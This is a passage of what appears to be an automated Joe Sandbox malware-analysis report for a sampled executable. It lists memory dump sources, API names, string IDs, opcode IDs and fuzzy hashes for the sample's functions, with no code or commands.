                                                    • Instruction Fuzzy Hash: 4AE1B272A0866782EB688F29985017D33A0FF45B8CF1C523DDA4EA7794DFB9E851C740
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: e+000$gfff
                                                    • API String ID: 0-3030954782
                                                    • Opcode ID: b0eb00ec9cc72bcbd25ebaa9050c7cd18c6ed420f4824bc0d073d86035fcaeec
                                                    • Instruction ID: c5f9d83ac982cff2513306bede21afd74380d2475158dfbca02737a5c39b2390
                                                    • Opcode Fuzzy Hash: b0eb00ec9cc72bcbd25ebaa9050c7cd18c6ed420f4824bc0d073d86035fcaeec
                                                    • Instruction Fuzzy Hash: 82517822B187E386E7208E35AC0176D6B91F745BA8F4C8239CB9C9BAD5DFBDD4448700
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: CurrentFeaturePresentProcessProcessor
                                                    • String ID:
                                                    • API String ID: 1010374628-0
                                                    • Opcode ID: d763eeadde26d203d3eed894b7e241bb7bf0a3b788ff63a0cf3fb266a06eef05
                                                    • Instruction ID: c46ad14ccd6a769773a312abc0aa33df495d26999e089fda9b8d00d31b0c31a8
                                                    • Opcode Fuzzy Hash: d763eeadde26d203d3eed894b7e241bb7bf0a3b788ff63a0cf3fb266a06eef05
                                                    • Instruction Fuzzy Hash: F102C321E0D66B40FA559B21BC1127B2691AF01BA8F4C463DDD6DEB7D5EEFCE4418B00
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: gfffffff
                                                    • API String ID: 0-1523873471
                                                    • Opcode ID: ce984bed762576d5ac079d260fe98dbb5d2c0c9497d8241e3c95b971abe0b5e7
                                                    • Instruction ID: 588bc1b0d5564f5c74c5efe19bb6be103776abf6f4d5062ede218bc0adac3949
                                                    • Opcode Fuzzy Hash: ce984bed762576d5ac079d260fe98dbb5d2c0c9497d8241e3c95b971abe0b5e7
                                                    • Instruction Fuzzy Hash: 3BA16763B087D786EB21CB25A8107AA7B91AB547A8F0C8039DE8D97785EE7DD501C701
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: TMP
                                                    • API String ID: 3215553584-3125297090
                                                    • Opcode ID: 227a240b370b15b1266a0cc9d4416acc6519c25bf7b5095cb295345a6af5b08f
                                                    • Instruction ID: 675baf1c15aaa097e1d99a27f58be1b770ae39ea97b397ff78adaf8c314ec3e7
                                                    • Opcode Fuzzy Hash: 227a240b370b15b1266a0cc9d4416acc6519c25bf7b5095cb295345a6af5b08f
                                                    • Instruction Fuzzy Hash: 8851AC11B0862B41EE64EA276D5217A62D26F84B9CF4C413DDE0EE7796EEBCE4428205
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: ed995d9d252c3e0c61107ed1ba5c48f1392176915e7fcf845d28b2722b2e2d45
                                                    • Instruction ID: 685e9cdf3108797b855975004f5eb72bfd6dd4be17945d4daf7baef9fe54b760
                                                    • Opcode Fuzzy Hash: ed995d9d252c3e0c61107ed1ba5c48f1392176915e7fcf845d28b2722b2e2d45
                                                    • Instruction Fuzzy Hash: 8EB09220E17A52C6FA086B51BCC221822A47F58714FE8507CC00DA2320DEAC20F58711
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ca9df69fd1c27fd416770dca946a20fccf44885df857cf64186a4c680355c85b
                                                    • Instruction ID: 0be488e82baf7efbd1da179c1776c963540dd827ffba0e05bd42e4fffff5921f
                                                    • Opcode Fuzzy Hash: ca9df69fd1c27fd416770dca946a20fccf44885df857cf64186a4c680355c85b
                                                    • Instruction Fuzzy Hash: 51D1BD72A0866386EB68CE2A995027D27A0EF45B4CF1C423DCE0DA77D5DFB9E841D341
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a6d76246942c46f132312ebc4a4bc27c309f6729675ee6fb805fd22939f347a0
                                                    • Instruction ID: 2775e8dcc9821d0ec00faa479e907325a0bc7506000da16572eff4aa8de605a7
                                                    • Opcode Fuzzy Hash: a6d76246942c46f132312ebc4a4bc27c309f6729675ee6fb805fd22939f347a0
                                                    • Instruction Fuzzy Hash: F1C1A4722141F14BD2C9EB29E86957E77A1F7C834DBC8403AEB8B57B8AC63CA114D710
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fa501f5897fa8170c1c3089a9165536d111e8d2735d862654f88cabfcab8bd87
                                                    • Instruction ID: bec81f0f539e93b9dffc5ab286f0e6000af2dcc7d967dd51d8fad033e0466ad4
                                                    • Opcode Fuzzy Hash: fa501f5897fa8170c1c3089a9165536d111e8d2735d862654f88cabfcab8bd87
                                                    • Instruction Fuzzy Hash: 18B16DB2A087A785E7688F39C85023D3BA0E745F4CF294139DA4EA7395DFBAD841C744
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dde3b387bb0edac5d3a7572aaf71fcdce3ba0ac9d1c4353072e234eccf42a557
                                                    • Instruction ID: 1fb8f5a46c5dd9c0961033635fdb20487dea7f30d15ca72c77329c6b38b396b2
                                                    • Opcode Fuzzy Hash: dde3b387bb0edac5d3a7572aaf71fcdce3ba0ac9d1c4353072e234eccf42a557
                                                    • Instruction Fuzzy Hash: 41810472A0C79246E774CF19A84037A7A91FB85798F58423DDB8D93B99DF7DD8048B00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID:
                                                    • API String ID: 3215553584-0
                                                    • Opcode ID: 9914cb7746023329a97bf4181aa287deee78f55ee5d35b62d6e15dbc326fdfe6
                                                    • Instruction ID: ab779076c67f2f7d7e9fa6be7d7aafe336b4ea5bc258dd7d7005352f636ef8c6
                                                    • Opcode Fuzzy Hash: 9914cb7746023329a97bf4181aa287deee78f55ee5d35b62d6e15dbc326fdfe6
                                                    • Instruction Fuzzy Hash: B661F622E2C2A346FB648B2CAC5467B6681AF40768F5D063DE65DD77D5EEFDE8008700
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 431273df7c005eff8b086499786a7f8af66af839407972891033f6f8b32510fa
                                                    • Instruction ID: ac8a276d0c3fe5834fac698bacdb9c95250dac103c616440fc8b4ffd6f2dfdac
                                                    • Opcode Fuzzy Hash: 431273df7c005eff8b086499786a7f8af66af839407972891033f6f8b32510fa
                                                    • Instruction Fuzzy Hash: BA516736A18A6385E7248F29D85427937A0EB54F6CF2C4139CE4DA7794CFBAE843D740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3986d2e28db3ad4c814196551e744b7f12e089580c78501851383343d29f5119
                                                    • Instruction ID: dd9a50ef98d64428923700380f2ce9ee3f1ab7e323e43337f80ea19c56562bf3
                                                    • Opcode Fuzzy Hash: 3986d2e28db3ad4c814196551e744b7f12e089580c78501851383343d29f5119
                                                    • Instruction Fuzzy Hash: FD516576A1866386E7248F29D44423837A1FB59F5CF285139CE4DA7794CFBAE843CB40
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a7def00a57181835e1b5755574f212d41c435eb46ac8bcc91c00ca4f50edce3
                                                    • Instruction ID: a3ef9278f648972a296942d77fb99f66b3cc4f4c9b31768ebde8f44ee2aac3c2
                                                    • Opcode Fuzzy Hash: 0a7def00a57181835e1b5755574f212d41c435eb46ac8bcc91c00ca4f50edce3
                                                    • Instruction Fuzzy Hash: 0D516476A1866386E7248F29C84163837A0EB55B6CF2C4139CE4DA7795CFBAEC43C740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5b37b721d2520797c932084b48cf8e5c5b4bbfd8b4955e3aae9fbd8879836657
                                                    • Instruction ID: 81c7d8385842fcf88749fe6c1b261b9e8ac78ec3b8103d5d15cd1db69bda840b
                                                    • Opcode Fuzzy Hash: 5b37b721d2520797c932084b48cf8e5c5b4bbfd8b4955e3aae9fbd8879836657
                                                    • Instruction Fuzzy Hash: B6518176A1866386E7248F29D85063827A1EB85B5CF285139CE4DA77A4CF7AEC42C740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 56eab1984f79c1160248cb97b5e30aec2666dd062f10dae5dc3084fdbc1595d5
                                                    • Instruction ID: def283647b4244bc3c9a443eb7b2b8fb6dd8ae1097ac82f839e404c7963e9fdb
                                                    • Opcode Fuzzy Hash: 56eab1984f79c1160248cb97b5e30aec2666dd062f10dae5dc3084fdbc1595d5
                                                    • Instruction Fuzzy Hash: 0D517336A1866685EB358F29C84063837A1EB55F5CF2C5139CA8DA7798CF7AE842C740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e4a792dd5f357ba9ab053cb868b8428acf2d0115ad083e523ed5123ef832f09c
                                                    • Instruction ID: 7fd06123434d9d1e48cb113f15bdf35dd33a4bf04496747920bdda32c9939fbc
                                                    • Opcode Fuzzy Hash: e4a792dd5f357ba9ab053cb868b8428acf2d0115ad083e523ed5123ef832f09c
                                                    • Instruction Fuzzy Hash: DA519636A1866686E7248F29D84033837A1EB49B5CF2C4135CE4DA7799CFBAED53C740
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                    • Instruction ID: 969183150f2b72366f533932a91e23538425c24740dcb2da66d9abe59a31123d
                                                    • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                    • Instruction Fuzzy Hash: 8741E562C0D7BB05E9958D584D046B46680EF23BA8E1C52BCCCBAF73C7CD9DA58AC205
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 485612231-0
                                                    • Opcode ID: f111dc0bb75c4fd458f0a84966b8cb0fe478d08570652a426d7f95957c6d4c4f
                                                    • Instruction ID: 9411d7b055d53e4d7f79ffe44894feaba08b39d26498794a47416ad54b19eeda
                                                    • Opcode Fuzzy Hash: f111dc0bb75c4fd458f0a84966b8cb0fe478d08570652a426d7f95957c6d4c4f
                                                    • Instruction Fuzzy Hash: E341E572B14A6582EF04CF6AED155A973A1BB48FD8B0D913ADE0DE7B58DE7CD1428300
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e0b9409b015bea46d2036294c0136b3200ade656a83a3c77deb383565566a918
                                                    • Instruction ID: 155a00ca01d18303f6f6624566e5db93cd3ea4f40d275aed2ed31abce6e52c94
                                                    • Opcode Fuzzy Hash: e0b9409b015bea46d2036294c0136b3200ade656a83a3c77deb383565566a918
                                                    • Instruction Fuzzy Hash: 8331A332B08B5342E764DF256C4017E6696AF84BE4F18423DEA9DA7BE5DFBCD0028604
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3f3f1020485e8a41a296fc930dbc96221e618d45f39aaa63d951921bdf06b5a
                                                    • Instruction ID: 1badb4e325469cf1dc2b9747bd713443254134327a5916339b4caef9366d6660
                                                    • Opcode Fuzzy Hash: c3f3f1020485e8a41a296fc930dbc96221e618d45f39aaa63d951921bdf06b5a
                                                    • Instruction Fuzzy Hash: C6F068B1B182658ADB988F69F80362977D0F708384F848539D58DC7B04DA7DD0609F04
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1670712868.00007FF652ED1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF652ED0000, based on PE: true
                                                    • Associated: 00000000.00000002.1670666035.00007FF652ED0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670794709.00007FF652EFC000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F0F000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1670822382.00007FF652F11000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1671010337.00007FF652F13000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ff652ed0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
                                                    • Instruction ID: df5a0feac41a9a349029aba4658e2bc5f5e98079faa9b08864d0a63a8c49175e
                                                    • Opcode Fuzzy Hash: b04046989d87c8dc885ed01c2b3f2aaa9c0b13633c97905e42662c4d2108a614
                                                    • Instruction Fuzzy Hash: 08A00162918862D0EA44CB00AC510212231ABA538CB59203AD11EB14A09EBCA454D210
                                                    APIs
                                                    Strings
